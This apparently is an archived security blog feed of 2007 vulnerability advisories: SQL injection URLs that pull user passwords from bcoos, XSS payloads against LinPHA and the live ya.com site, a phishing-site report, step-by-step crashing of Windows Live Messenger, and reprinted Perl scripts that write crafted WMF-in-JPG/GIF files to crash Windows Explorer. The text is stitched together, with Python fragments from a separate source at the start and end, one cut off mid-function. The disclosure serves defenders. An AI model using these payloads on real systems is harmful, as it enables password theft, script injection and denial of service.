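    for name, (blocked, cast) in report().items():
        print("%-8s blacklist=%-5s intval=%d" % (name, blocked, cast))
```

The report shows the point of the caveat: the advisory's payload is stopped, the tab and newline variants walk straight past the check, and intval() reduces all three to -1, which is the only thing the query should ever have received.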
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-40986379932548166552007-11-30T10:14:00.000-08:002007-12-03T12:10:21.637-08:00Bcoops adresses/ratefile.php lid variable SQL injection########################################################<br />Bcoops adresses/ratefile.php lid variable SQL injection<br />vendor url: http://www.bcoops.net<br />Advisory: http://lostmon.blogspot.com/2007/11/bcoops-adressesratefilephp-lid-variable.html<br />vendor notified: NO exploits available: YES<br />########################################################<br /><br /><br />bcoos is a content/community management system written in PHP and MySQL.<br /><br />bcoos contains a flaw that may allow an attacker to carry out a SQL injection attack. The issue is due to the adresses/ratefile.php script not properly sanitizing user-supplied input to the 'lid' parameter. This may allow an attacker to inject or manipulate SQL queries in the backend database.<br /><br /><br />#################<br />Versions:<br />#################<br /><br />bcoos <= 1.0.10 vulnerable<br /><br />#################<br />Solution:<br />#################<br /><br />No solution at this time !!!<br />Try editing the source code<br />or try another product.<br /><br />#################<br />Timeline:<br />#################<br /><br />Discovered: 25-11-2007<br />vendor notified: --------<br />vendor response: -------<br />disclosure: 30-11-2007<br /><br /><br />#################<br />SQL injections:<br />#################<br /><br /><br />http://localhost/bcoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br /><br />####################### €nd ##############################<br /><br /><br />Thanks to Estrella for being my light<br />Thanks to FalconDeOro for his support<br />Thanks to Imydes from http://www.imydes.com<br /><br /><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-34253941201029078812007-11-28T12:21:00.000-08:002007-12-01T03:05:11.540-08:00Bcoops SQL injection and Cross-site scripting####################################################<br />Bcoops SQL injection and Cross-site scripting<br />vendor url: http://www.bcoops.net<br />Advisory: http://lostmon.blogspot.com/2007/11/bcoops-sql-injection-and-cross-site.html<br />vendor notified: YES exploits available: YES<br />####################################################<br /><br /><br />bcoos is a content/community management system written in PHP and MySQL.<br /><br />bcoos contains a flaw that may allow an attacker to carry out a SQL injection attack. The issue is due to the arcade/index.php script not properly sanitizing user-supplied input to the 'gid' parameter; the myalbum/ratephoto.php script and its 'lid' parameter are affected by the same flaw. This may allow an attacker to inject or manipulate SQL queries in the backend database.<br /><br /><br />bcoos also contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the 'day' and 'year' parameters upon submission to the modules/theecal/display.php script. This could allow a user to create a specially crafted URL that would execute arbitrary script in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.<br /><br /><br />#################<br />Versions:<br />#################<br /><br />bcoos <= 1.0.10 vulnerable<br /><br />#################<br />Solution:<br />#################<br /><br />No solution at this time !!!<br /><br />#################<br />Timeline:<br />#################<br /><br />Discovered: 25-11-2007<br />vendor notified: 27-11-2007<br />vendor response: -------<br />disclosure: 28-11-2007<br /><br /><br />#################<br />SQL injections:<br />#################<br /><br />http://localhost/modules/arcade/index.php?act=show_stats&gid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br />http://localhost/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br />http://localhost/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br /><br />#####################<br />Cross-site Scripting<br />#####################<br /><br /><br />http://localhost/modules/ecal/display.php?day=17&month=11&year=2007"><script>alert()</script><br /><br /><br />http://localhost/modules/ecal/display.php?day=1"><script>alert()</script>&month=11&year=2007<br /><br /><br /><br />####################### €nd ############################<br /><br /><br /><br />Thanks to Estrella for being my light<br />Thanks to FalconDeOro for his support<br />Thanks to Imydes from http://www.imydes.com<br /><br /><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-10406134663107509442007-10-04T12:35:00.000-07:002007-12-01T03:04:34.535-08:00Password theft through a Google Gmail scam#####################################################<br />Password theft through a Google Gmail scam<br />Password theft through phishing at E-bullion<br />Discoverers and researchers: Lostmon(1) Imydes(2)<br />Original article: <a href="http://www.imydes.com/?p=117" target="_BLANK">http://www.imydes.com/?p=117</a><br />Date: 03/10/2007<br />####################################################<br /><br />This article comes from joint work with <a href="http://www.imydes.com/" target="_BLANK">Imydes</a>; the address of the original article is: <a href="http://www.imydes.com/?p=117">http://www.imydes.com/?p=117</a><br /><br />--<br />As you probably all know, Google has quite a few services behind it, to name some:<br />Google Adsense, Google Docs, Gmail, Blogger, Picassa…<br /><br />This Gmail Accounts scam, whose aim is to steal the password of an unwary internet user, could give access to all of the Google services mentioned.<br /><br />The scam in question consists of imitating a Google form titled "My Account", pretending to be a manager for editing the personal information of the Google account.<br /><br />In that form we find the following fields:<br /><br />Username<br />Password<br />First name<br />Last name<br />Nick name<br />Zip code<br />Country<br /><br />(A small note: an intermediate user who falls for it the first time can spot a small mistake, namely that the Password field is not masked with **** and the password is shown in plain sight, and that the Country field is a drop-down with several countries which, not being encoded in UTF-8, show up with "strange characters".)<br /><a href="http://www.imydes.com/wp-content/uploads/2007/10/us-gmailcom-imydes.JPG" target="_blank"><IMG src="http://www.imydes.com/wp-content/uploads/2007/10/us-gmailcom-imydes.JPG" height="250" width="400"></a><br />Gmail Accounts Scam Imydes<br /><br />If we fill in the fields named above and click "Save", we see that it sends us to "update.php", where the information entered in the form is presumably stored (I don't know whether in a database or in a file).<br /><br />On the other hand, if we go to the site directly without "www", we see that the scam's creators forgot to put an index page in place so that you cannot see the contents of the server root.<br /><br />Through this oversight we can see a system for sending the scam as mass e-mail (specifically, the web address is this: http://us-gmail.com/mail.php).<br /><br />We can also see a web page that presumably follows the same pattern as the Gmail scam but with e-Bullion (web http://us-gmail.com/e-lbullion/). We can see that in the e-bullion case it goes to "/secure/update.php".<br /><a href="http://www.imydes.com/wp-content/uploads/2007/10/e-bullion-imydes.JPG" target="_blank"><IMG src="http://www.imydes.com/wp-content/uploads/2007/10/e-bullion-imydes.JPG" height="250" width="400"></a><br />E-bullion Phishing<br /><br />Credits:<br /><br />Imydes (scam documentation and research)(<a href="http://www.imydes.com">www.imydes.com</a>)<br />Lostmon (discoverer of this scam and research) (<a href="http://lostmon.blogspot.com">http://lostmon.blogspot.com</a>)<br />Lostmon Group (<a href="http://groups.google.com/group/lostmon" target="_BLANK">http://groups.google.com/group/lostmon</a>)<br /><br />Thanks to XiuX, MARNI, itimad, Yeremat, Soed, Newcastle for trusting me.<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-57535572165838118092007-09-21T23:49:00.000-07:002007-12-01T03:05:45.711-08:00Windows live Messenger malformed file overflow DoS remote exploitation.##############################################################<br />Windows Live Messenger malformed file overflow remote exploitation.<br />(windows ole32.dll MS07-024) (windows GDI MS07-046)<br />vendor url: http://www.microsoft.com/ , http://get.live.com/messenger/overview<br />Advisory: http://lostmon.blogspot.com/2007/09/windows-live-messenger-jpg-overflow.html<br />Vendor notified: YES Vendor confirmed: yes (DoS issue) Exploitation included: YES<br />BID:<a href="http://www.securityfocus.com/bid/25795" target="_BLANK">25795</a><br />#############################################################<br /><br />A buffer overflow exists in Windows Live Messenger (MSN Live). The GDI engine fails to handle malformed data in image files, resulting in a buffer overflow. With a specially crafted jpg, wmf, gif, doc or ico file, an attacker can cause a DoS, and possibly arbitrary code execution (RCE not confirmed), resulting in a loss of integrity.<br /><br />############<br />History<br />############<br /><br />After installing the patch for the Windows GDI vulnerability MS07-046, I ran several tests with malformed image files (jpg, gif, wmf, ico, doc) and got the same result before and after installing the patch :(<br /><br />###############<br />versions tested<br />###############<br /><br />All of these versions with Windows Live Messenger 8.1. I don't know whether other versions of Windows are vulnerable too, but I think all the systems listed in the MS07-046 Microsoft bulletin are.<br /><br />Win XP Media Center version 2002 Service Pack 2<br />Win XP Pro<br />Win XP Home<br /><br />###############<br />Solution<br />###############<br />No solution is available at this time, but<br /><br />DON'T SHARE ANY FOLDER IN MSN UNTIL<br />THERE IS A SOLUTION OR PATCH !!!!!!<br /><br />The vendor plans to address this issue in the next service pack.<br /><br />###############<br />Timeline<br />###############<br /><br />Discovered: 20-08-2007<br />Vendor initial contact: 23-08-2007<br />Vendor response: 24-08-2007<br />Vendor patch: ---<br />Private disclosure: 17-09-2007<br />Public disclosure:<br /><br />##############<br />Impact<br />##############<br /><br />A remote user can cause a DoS in the application. If the patch for Windows metafiles (wmf) does not work correctly, a remote user might be able to execute arbitrary code, but I'm not sure RCE can be achieved.<br /><br /><br />##########################<br />Explanation Step By Step<br />##########################<br /><br />What do we need?<br /><br />- Two machines with Windows Live Messenger 8.1, running<br />- two of the systems listed in the versions section.<br />- A malformed image such as a jpg, gif or wmf.<br /><br />Machine 1 => MSN 8.1 & Windows XP Media Center 2002, fully patched. [victim]<br />Machine 2 => MSN 8.1 & Windows XP Home, fully patched. [evil_attacker]<br /><br />Windows Live Messenger 8.1 has an option to share folders with other contacts. The first time you share a folder with a contact, MSN asks for confirmation; if you accept, the folder is shared automatically from then on.<br /><br />To find the folder location you can go to My Computer / MSN folders / [VICTIM]@hotmail.com<br /><br />and the physical path is:<br /><br />C:\Documents and Settings\[YOUR_USER]\Configuración local\<br />Datos de programa\Microsoft\Messenger\[ATTACKER]@hotmail.com\<br />Sharing Folders\[VICTIM]@hotmail.com<br /><br />1 - Log in to MSN on both machines.<br />2 - On machine 2, open a conversation window with machine 1.<br />3 - On machine 2, click the icon to share a folder.<br />4 - On machine 1, accept the share.<br />5 - On machine 1, put a new folder inside the shared folder and, inside it, a malformed jpg file; do this through the physical path, not through MSN, because if you drag and drop the image onto the shared folder inside MSN the application crashes.<br />6 - On both machines, close the shared folder.<br /><br />Now machine 1 has, at the physical path of the shared folder, a folder with a malformed image.<br /><br />7 - On machine 2, click the share icon. When MSN on machine 1 tries to open and send the list of files inside the folder, MSN on machine 1 crashes, and if you don't terminate the process Windows crashes too, with a blue screen of death :S<br /><br />Now you can crash MSN on the victim's machine every time you click the share icon. The victim has to delete that folder to stop this.<br /><br />OK, thinking further: we need to put the image on the victim's machine. Can we do it without the victim's interaction? ...yes, the victim only needs to make one click :)<br /><br />If we have a shared folder with the victim, and victim and attacker are both online, the victim can put a new folder with the malformed image in his local shared folder, and in the attacker's conversation window a new message appears that says something like:<br /><br />"The victim has added files to the shared folder, would you like to synchronise or update?"<br /><br />If the attacker clicks yes, MSN on the attacker's machine crashes, and from now on the victim can crash the attacker's MSN every time. The attacker has to delete the folder with the evil jpg.<br /><br />I have an easier way to exploit and/or manipulate the malformed file:<br /><br />1 - Share a folder with a contact in MSN.<br />2 - Close the shared folder in MSN.<br />3 - Open a cmd and go to the physical path of the shared folder.<br />4 - Generate the malformed file with perl, python or similar.<br /><br />If the file is generated while you have a conversation window open with the victim, your MSN says "all files are uploaded" when it finishes synchronising with the victim's MSN, and the victim's MSN says "user bla bla bla has updated the shared folder" or similar.<br /><br />Now the exploit is on your machine and on the victim's machine.<br /><br />If you click the shared-folder icon while the exploit is still on your machine, your own MSN crashes; but if, after synchronisation, you delete the malformed file from your local folder and then click the shared folder, MSN tries to synchronise the victim's shared folder with yours and MSN on the victim's machine crashes.<br /><br />I think some of these issues with malformed files come from the extended file attributes.<br /><br />If anyone would like to dig deeper, here are two related articles:<br /><br />First part:<br /><br />http://lostmon.blogspot.com/2007/06/buffer-overflow-in-extended-file.html<br /><br />Second part:<br /><br />http://lostmon.blogspot.com/2007/08/windows-extended-file-attributes-buffer.html<br /><br />and the related Microsoft bulletins:<br /><br />Vulnerability in ole32.dll:<br /><br />http://www.microsoft.com/technet/security/bulletin/ms07-024.mspx<br /><br />Vulnerability in gdi32.dll:<br /><br />http://www.microsoft.com/technet/security/bulletin/ms07-046.mspx<br /><br /><br /><br />########################## €nd #####################<br /><br />Thanks to Estrella for being my light.<br />Thanks to Dave from the security center for his patience.<br />Thanks to FalconDeOro (patience is a virtue, young Jedi).<br />Thanks to all the Lostmon Group Team.<br />Thanks to N0xTrUm from N0xTrUm Technologies http://n0xtrum.blogspot.com/<br />Thanks to ANELKAOS from http://www.elhacker.net/ for his support.<br /><br /><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-21653646405707274522007-09-07T11:33:00.000-07:002007-10-25T12:28:18.155-07:00LINPHA 1.3.1 Multiple Scripts XSS##########################################<br />LINPHA 1.3.1 Multiple Scripts XSS<br />vendor url: http://linpha.sourceforge.net<br />Advisory: http://lostmon.blogspot.com/2007/09/linpha-131-multiple-scripts-xss.html<br />vendor informed: NO exploit available: YES<br />##########################################<br /><br /><br />LinPHA is an easy to use, multilingual, flexible photo/image archive/album/gallery written in PHP. It uses a SQL database (MySQL/PostgreSQL/SQLite) to store information about your pictures.<br /><br /><br />LinPHA contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate multiple parameters upon submission to multiple scripts. This could allow a user to create a specially crafted URL that would execute arbitrary script in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.<br /><br /><br />################<br />Versions<br />################<br /><br />LinPHA 1.3.1<br /><br />################<br />Timeline<br />################<br /><br />Discovered: 05-08-2007<br />disclosure: 07-09-2007<br /><br />###################<br />Examples<br />###################<br />http://localhost/linpha/actions/image_resized_view.php?imgid=2945"><body><script>alert()</script><h1>lalala</h1></body>&wh=800x600<br /><br />http://localhost/linpha/search.php?1=1&pn=2"><script>alert()</script>#tn<br /><br />http://localhost/linpha/viewer.php?album=etc/passwd"><body><script>alert()</script><h1>lalala</h1></body><br /><br />http://localhost/linpha/search.php?1=1&order="><body><script>alert()</script><h1>lalala</h1></body><br /><br />http://localhost/linpha/search.php?1=1&imgid=14013"><body><script>alert()</script><h1>lalala</h1></body><br /><br />http://localhost/linpha/search.php?search_text=a&order="><body><script>alert()</script><h1>lalala</h1></body><br /><br />Other parameters and scripts are affected as well...<br /><br />###################### €nd ###############################<br /><br />Thanks to Estrella for being my light<br />Thanks to all Lostmon's Group Team<br /><br /><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la m mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-14451728487760705342007-08-30T10:42:00.000-07:002007-10-25T12:28:18.156-07:00Ya.com suffers from XSS holes###################################<br />Ya.com suffers from XSS holes<br />###################################<br /><br />The Ya.com website is affected by cross-site scripting vulnerabilities.<br /><br />The holes are located under the subdomain acceso.ya.com and likewise on corp.ya.com.<br /><br />Besides the ones mentioned here as a proof of concept, there are a few more in some other dynamic areas of the portal.<br /><br />After trying several times to contact ya.com, it turned out to be impossible: the only contact method on their website is by telephone, and I am not willing to spend my own money to report bugs in their website. So I had to send e-mails blindly to seguridad, security, etc. @ya.com to see whether by luck any of them existed, which I see they do not, since I got no reply, or else they simply don't care...<br /><br />Some examples of this exploitation:<br /><br />https://acceso.ya.com/ayuda/searchfunc.html?si=html&co=20&sw=[XSS-CODE]&Submit=Buscar<br /><br /><br />http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2&nombreoferta=[XSS-CODE]&nombrearea=Programa%20de%20Becas<br /><br />http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2&nombreoferta=&nombrearea=Programa%20de%20Becas[XSS-CODE]<br /><br />##################### €nd ###########################<br /><br />Thanks to Estrella for being my light.<br />Thanks to all the Lostmon Team !!!<br /><br /><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-38937153728026786832007-08-09T15:18:00.000-07:002007-08-10T03:05:20.986-07:00Windows Extended file attributes buffer overflow Study II##########################################################<br />Windows Extended file attributes buffer overflow Study II<br />Original:<br />##########################################################<br /><br />In a previous article , i write about extended file<br />attributes:<br /><br /> "A local buffer overflow exists in the windows explorer . <br /> The extended file atributes functions have a small size <br /> of the buffer in 'FileAllInformation(),FileNameInformation'<br /> and other subfunctions in Undocumented functions of NTDLL ,<br /> resulting in a buffer overflow. With a unknow impact."<br /><br /> Original article:<br /><br /> http://lostmon.blogspot.com/2007/06/<br /> buffer-overflow-in-extended-file.html<br /> <br />I Write "this issue could be done in all files"...<br /><br />Now i go to extend some details moore of my investigation <br />and the research of this issue.<br /><br />Look the new vulnerabilities on Microsoft windows GDI and ole32<br /> <br />http://www.securityfocus.com/bid/16167<br />http://www.securityfocus.com/bid/25207<br />http://secunia.com/advisories/10020/<br />http://secunia.com/advisories/10194/<br />http://osvdb.org/displayvuln.php?osvdb_id=31885<br />http://osvdb.org/displayvuln.php?osvdb_id=31886<br />http://osvdb.org/displayvuln.php?osvdb_id=31887<br /><br />All PoC and all exploits have some details to study.<br /><br />All files wen explorer crash ,crashing wen try to look <br />the extended file atributes of any file (*.jpg,*.doc,*.gif,*.wmf)<br />How to demostrate it ??<br /><br />All exploits have some similitudes ....<br />all crafted files crashing at the same point or at the same properties<br />this is a litle 
test/study of those exploits/vulnerabilities.


############################################
Testing with filemon and EFA.vbs
############################################


####################
Exploit wmf File
####################

Download the BID 16167 exploit and unzip it in c:\test

Open filemon, include the process explorer.exe
and click on apply.
Now open c:\test\ and when Explorer looks at the EFA for the wmf
file, it crashes, or when you put the mouse over it...

In filemon, when the crash happens, we have something similar to:

Screenshot: http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_WMF.GIF

filemon marks the overflow in the 'FileAllInformation()' function.

Another test with the same file:

Save EFA_test.vbs and execute it; the Windows Scripting Host
crashes when it tries to look at extended attribute number 9 (Author).

Delete the file from a DOS command line :)

####################
Exploit jpg file
####################

Download the BID 25207 exploit and unzip it in c:\test

Open filemon, include the process explorer.exe
and click on apply.
Now open c:\test\ and when Explorer looks at the EFA for the jpg
file, it crashes, or when you put the mouse over it...

In filemon, when the crash happens, we have something similar to:

Screenshot: http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_jpg.GIF

filemon marks the overflow in the 'FileAllInformation()' function.

Another test with the same file:

Save EFA_test.vbs and execute it; the Windows Scripting Host
crashes when it tries to look at extended attribute number 9 (Author).

Delete the file from a DOS command line :)

###################
Exploit Gif file
###################

Save the exploit for the Gif file in c:\test

Open filemon, include the process explorer.exe
and click on apply.
Now open c:\test\ and when Explorer looks at the EFA for the gif
file, it crashes, or when you put the mouse over it...

In filemon, when the crash happens, we have something similar to:

Screenshot: http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_art.GIF

filemon marks the overflow in the 'FileAllInformation()' function.

Another test with the same file:

Save EFA_test.vbs and execute it; the Windows Scripting Host
crashes when it tries to look at extended attribute number 9 (Author).

Delete the file from a DOS command line :)

###################
Exploit Doc file
###################

Unzip explorer_crasher.doc in c:\test\
Open filemon, include the process explorer.exe
and click on apply.
Now open c:\test\ and when Explorer looks at the EFA for the doc
file, it crashes, or when you put the mouse over it...

In filemon, when the crash happens, filemon marks the
overflow in the 'FileAllInformation()' function.

Another test with the same file:

Save EFA_test.vbs and execute it; the Windows Scripting Host
crashes when it tries to look at extended attribute number 9 (Author).

Delete the doc file from a DOS command line :)

#################################
LINKS AND FILES NEEDED
#################################

For testing this you need all the exploits, filemon and EFA.vbs.

Download filemon:

http://www.microsoft.com/technet/
sysinternals/FileAndDisk/Filemon.mspx

Download Exploit Word file DoS:

http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar

Download exploit BID 16167:

http://www.securityfocus.com/data/
vulnerabilities/exploits/WMF-DoS.rar

Exploit BID 25207:
########################################################
#!/usr/bin/perl

#Bug found and ExpLoitEd by CrazyAngel
# Greets: st0rke, Elite, P0uya_s3rv3r, Aria
# ThnX ALL Shabgard.Org Members Specially Moderators and Clans

print "\nJPG PoC denial of service exploit by CrazyAngel ";
print "\n\ngenerating something.jpg...";
open(JPG, ">./something.jpg") or die "cannot create jpg file\n";
print JPG "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x72\x65\x7A\x61\x2E\x65";
print JPG "\x78\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print JPG "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print JPG "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print JPG "\x00\x00\x00\x00";
close(JPG);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";

##########################################################


Save Gif file gdi32.dll DoS:

##########################################################
#!/usr/bin/perl
##########################################################
# Bug Found By ::DeltahackingTEAM
##
# Coded By Reza.Yavari (Dr.Pantagon)
##
#Web Site::Www.Deltahacking.net And Www.DeltaSecurity.ir And Www.PersianWhois.com
##
#Free Upload :: Www.Persianupload.com And Www.Persianupload.net
##
#Email: Dr.Pantagon [A]Deltasecurity.ir
##
# We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem

# The address is escaped so Perl does not interpolate it as an array.
print "\nGIF PoC denial of service exploit by Dr.Pantagon <Dr.Pantagon\@deltasecurity.ir>";
print "\n\ngenerating Art.gif...";
print "\n\nUsage :";
print "\n\n1- Mouse Over Art.gif For Excute Exploit ";
print "\n\n2- Single Click Art.gif For Excute Exploit ";
print "\n\n3- Double Clik Art.gif (Open) For Excute Exploit ";
print "\n\n4- More... ";
print "\n\nYou Can open Art.gif Or Select Art.gif(Single Click) Or Delete Art.gif For Run(Excute) Exploit";
open(gif, ">./Art.gif") or die "cannot create gif file\n";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99";
print gif "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
close(gif);
print "ok\n\nok Gif Exploit Creat and run exploit and wait :)\n";

# milw0rm.com [2007-07-23]
########################################################

Save EFA_test.vbs:

#######################
EFA_test.vbs
########################

' Enumerate the extended file attributes (the "Details" columns) of
' every file in C:\test through the Shell.Application object.
Dim arrHeaders(35)
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("C:\test")
' Read the 35 column names once.
For i = 0 To 34
    arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)
Next
' Print every column of every file; the crafted files crash WSH at column 9 (Author).
For Each strFileName In objFolder.Items
    For i = 0 To 34
        Wscript.Echo i & vbTab & arrHeaders(i) _
            & ": " & objFolder.GetDetailsOf(strFileName, i)
    Next
Next
#########################################################

######################## €nd #########################

Thanks to estrella for being my light
Thanks to FalconDeOro, who investigated and documented this issue with me.
Thanks to Icaro and the Badchecksum Team for their interest in the research.
Thanks to Jkouns and Jericho for their patience.
Thanks to all the OSVDB manglers; they are involved in a very nice project.
Thanks to the Secunia Research Team; they do very good co-work with researchers.
Thanks to all of Lostmon's Group Team

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
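Both crafted files that the Perl scripts above write begin with the 18-byte WMF METAHEADER (01 00 09 00 00 03 ... for something.jpg, 02 00 09 00 00 03 ... for Art.gif), which is the similarity the post points at: the extension says image, the content says metafile. As an added example that is not part of the original post nor of either PoC, the following Python check parses that header and the record list and reports which format invariants a file breaks; the 68 sample bytes are the ones the BID 25207 script writes, copied from above, while the clean metafile, the issue labels and every function name are constructed here.

```python
import struct
from typing import Dict, List

HEADER_FMT = "<HHHIHIH"   # METAHEADER: mtType, mtHeaderSize, mtVersion,
                          # mtSize, mtNoObjects, mtMaxRecord, mtNoParameters
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 18 bytes
RECORD_FMT = "<IH"        # each record: RecordSize (16-bit words), RecordFunction
META_EOF = 0x0000
# Record functions that add an entry to the metafile object table
# (the MS-WMF object record types).
OBJECT_CREATORS = {0x00F7, 0x0142, 0x01F9, 0x02FA, 0x02FB, 0x02FC, 0x06FF}

# The 68 bytes the BID 25207 script above writes to something.jpg
# (copied from the page; only the constant name is ours).
POC_JPG = bytes.fromhex(
    "0100090000032200000072657a612e65"
    "784507000000fc020000000000000000"
    "08000000fa0200000000000000000000"
    "07000000fc0208000000000000800300"
    "00000000"
)

# Constructed clean file: a header whose counts are all true plus META_EOF.
CLEAN_WMF = (struct.pack(HEADER_FMT, 1, 9, 0x300, 12, 0, 3, 0)
             + struct.pack(RECORD_FMT, 3, META_EOF))


def looks_like_wmf(data: bytes) -> bool:
    """True when the leading bytes form a plausible METAHEADER, whatever the name says."""
    if len(data) < HEADER_LEN:
        return False
    mt_type, hdr_size, version = struct.unpack_from("<HHH", data, 0)
    return mt_type in (1, 2) and hdr_size == 9 and version in (0x100, 0x300)


def parse_header(data: bytes) -> Dict[str, int]:
    names = ("mtType", "mtHeaderSize", "mtVersion", "mtSize",
             "mtNoObjects", "mtMaxRecord", "mtNoParameters")
    return dict(zip(names, struct.unpack_from(HEADER_FMT, data, 0)))


def walk_records(data: bytes, issues: List[str]) -> int:
    """Walk the record list, appending problems to issues; return how many
    records create objects (the true size of the object table)."""
    created, offset = 0, HEADER_LEN
    while offset + struct.calcsize(RECORD_FMT) <= len(data):
        size_words, func = struct.unpack_from(RECORD_FMT, data, offset)
        if size_words < 3:                    # size + function alone take 3 words
            issues.append("record-too-small")
            return created
        if offset + size_words * 2 > len(data):
            issues.append("record-overrun")
            return created
        if func == META_EOF:
            return created
        if func in OBJECT_CREATORS:
            created += 1
        offset += size_words * 2
    issues.append("no-eof")
    return created


def inspect_file(name: str, data: bytes) -> List[str]:
    """Return the header/record invariants the file violates (empty for a
    clean metafile, and empty for a file that is not a WMF at all)."""
    issues: List[str] = []
    if not looks_like_wmf(data):
        return issues
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext != "wmf":                      # metafile content behind .jpg/.gif/.doc
        issues.append("ext-mismatch")
    h = parse_header(data)
    if h["mtSize"] * 2 != len(data):      # mtSize counts 16-bit words
        issues.append("size-mismatch")
    if h["mtMaxRecord"] > h["mtSize"]:    # no record can be larger than the file
        issues.append("maxrecord-exceeds-file")
    if h["mtNoParameters"] != 0:          # documented as unused, must be zero
        issues.append("reserved-nonzero")
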